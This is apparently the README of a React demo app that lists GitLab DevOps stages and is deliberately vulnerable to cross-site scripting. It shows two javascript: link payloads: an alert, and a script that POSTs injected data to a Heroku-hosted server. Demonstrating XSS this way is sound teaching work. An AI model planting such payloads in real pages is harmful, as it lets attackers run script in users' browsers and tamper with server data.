## About
React application that fetches a list of GitLab DevOps lifecycle stages and displays it on a list.

The list of stages includes two examples of XSS injection that will executed javascript when clicking in the link.

## Scripts

Example 1:
```
<a href="javascript: alert('XSS Demo!')">XSS attack example 1!</a>
```

Example 2:
```
<a href="javascript:var xhr = new XMLHttpRequest();
var payload=JSON.stringify({stage:'Malicious Data!'});
xhr.open('POST','https://gitlab-demo-server.herokuapp.com/stages',true);
xhr.setRequestHeader('Content-type','application/json');
xhr.send(payload);">XSS attack example 2!</a>
```

## How to

Run locally

`yarn start-local`

Build

`yarn build`